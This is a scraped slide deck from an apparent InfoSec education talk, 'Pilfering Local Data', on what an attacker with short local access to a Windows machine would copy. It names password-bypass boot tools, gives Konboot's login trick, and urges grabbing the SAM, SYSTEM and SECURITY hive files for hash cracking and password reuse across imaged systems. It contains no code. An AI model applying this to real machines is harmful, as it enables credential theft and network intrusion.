PowerPoint search engine with thumbnail results

Newest Viewed Downloaded

What I plan to coverCore items an attacker would want to locate and copy off of a Windows system with short term access Data that could be found: Passwords, Usernames Docs, Emails, Paths Tools they would use to bypass weak security precautions like file system permissions and OS/BIOs passwords

Pilfering Local Data:Things an Attacker Would want to Grab with Short Term Local Access Adrian Crenshaw ‹#›

About Adrian I run Irongeek.com I have an interest in InfoSec education I don’t know everything - I’m just a geek with time on my hands (ir)Regular on:http://www.isdpodcast.com/ Take a note from Johnny Long’s book, and Bruce Potter’s book. ‹#›

What I plan to cover Core items an attacker would want to locate and copy off of a Windows system with short term access Data that could be found: Passwords, Usernames Docs, Emails, Paths Tools they would use to bypass weak security precautions like file system permissions and OS/BIOs passwords

Why this talk is sort of a sham If you have short term access, your goal as an attacker should be to extend that access There are just so many options for useful files to grab, so it’s hard to decide the most important Still useful from the context of stolen and decommissioned equipment, but then time is not as critical

How are we getting at the data?

Distros/Boot environments Just a few: BackTrack Linuxhttp://www.backtrack-linux.org Bart’s PE/UBCD4Winhttp://www.nu2.nu/pebuilder/ http://www.ubcd4win.com/ Winbuilder/Win7PE SEhttp://winbuilder.net/ & http://reboot.pro/12427/ Konboothttp://www.piotrbania.com/all/kon-boot/

BackTrack Linux Tons of security tools Awesome hardware support for odd wireless needs Well maintained Can do a hard drive install if you wish Image from http://www.backtrack-linux.org/screenshots/

Bart’s PE/UBCD4Win Bart’s PE can be built from the files on a Windows XP CD UBCD4Win is Bart’s Pe with a bunch of extras + Multi-boot (DBAN) Plugins can be made to add functionality Image from http://www.ubcd4win.com/screen.htm

Winbuilder/Win7PE SE Make a Windows based boot USB/CD/DVD Starting OS needed depends on build Plugins can be made to add functionality Build even up to Win7 SP1 32/64bit Hardcore roll your own Image from http://reboot.pro/12427/

Konboot Bypass password on some versions of Windows and Linux Changes kernel on boot Login to Linux with “kon-usr” as username. Use a blank password in Windows Meant to run from a CD/Floppy, sometimes works from a UFD using instructions found here: http://www.irongeek.com/i.php?page=security/kon-boot-from-usb Image from http://www.piotrbania.com/all/kon-boot/

Remote exploits as well Metasploit/Armitage http://www.fastandeasyhacking.com/

Some Useful Tools

NirSoft Tools http://launcher.nirsoft.net/

Cain http://www.oxid.it/cain.html

Passwords and hashes

Windows System Trifecta C:\Windows\System32\config SAM SYSTEM SECURITY Grab These Files!!! NTUSER.DAT may also be useful as it maps to HKEY_CURRENT_USER Hell, get SOFTWARE to while you are at it!

Why these files? Cain LSA Secrets:SYSTEM and SECURITY Cached passwords:SYSTEM and SECURITY SAM Hashes: SAM and SYSTEM WirelessKeyView will do via Windows dir on Windows XP

Why exploit local passwords?

There are several reasons why an attacker may want to find local passwords: To escalate privileges on the local host (install games, sniffers, key stroke catchers and other software or just to bypass restrictions). Local passwords can be used to gain access to other systems on the network. Admins may reuse the same usernames and passwords on other network hosts (more than likely if they use hard drive imaging). Similar themes are also often used for password selection. Just for the fun of doing it.

Scenario Imaged Systems Attacker grabs localpassword on one box Uses it on other systems Grabs passwords from other systems, and installs keyloggers/sniffers to get network credentials for more systems Repeat ad nauseum

Glossary

Cracking a Password: De-obfuscating a password’s representation.Brute force attack: Using all possible character combinations till a match for the password is found. Also know as an incremental attack in John the Ripper.Dictionary attack: Using each entry in a word list until a match for the password is found.Hashing: Applying a mathematical formula to a piece of text to get a shorter number or string.One way hash: A hash where the original string the hash was derived from can not be easily found by a simple method.Plain text: The un-obfuscated or un-encrypted form of a string. Opposite of cipher text.Password Hash: The “hashed” version of a password that’s stored for later authentication.Reversible Encryption (Obfuscation): Encryption that is easily reversed if the algorithm is know. Example: ROT13.Salt: A number used to seed a hashing or encryption algorithm to add to the possible number of outcome the ciphertexts.

Showing 1 - 20 of 55 items Details

Name:

pilfering-local-data

Author:

adrian

Company:

N/A

Description:

What I plan to coverCore items an attacker would want to locate and copy off of a Windows system with short term access Data that could be found: Passwords, Usernames Docs, Emails, Paths Tools they would use to bypass weak security precautions like file system permissions and OS/BIOs passwords

Tags:

Created:

8/16/2006 12:00:00 AM

Slides:

Views:

Downloads:

Rating:

> Comment

Share this presentation
|

1 2 3 Next >>

Login using your SlideFinder account

Or use your third party provider to login

What I plan to coverCore items an attacker would want to locate and copy off of a Windows system with short term access Data that could be found: Passwords, Usernames Docs, Emails, Paths Tools they would use to bypass weak security precautions like file system permissions and OS/BIOs passwords

Pilfering Local Data:Things an Attacker Would want to Grab with Short Term Local Access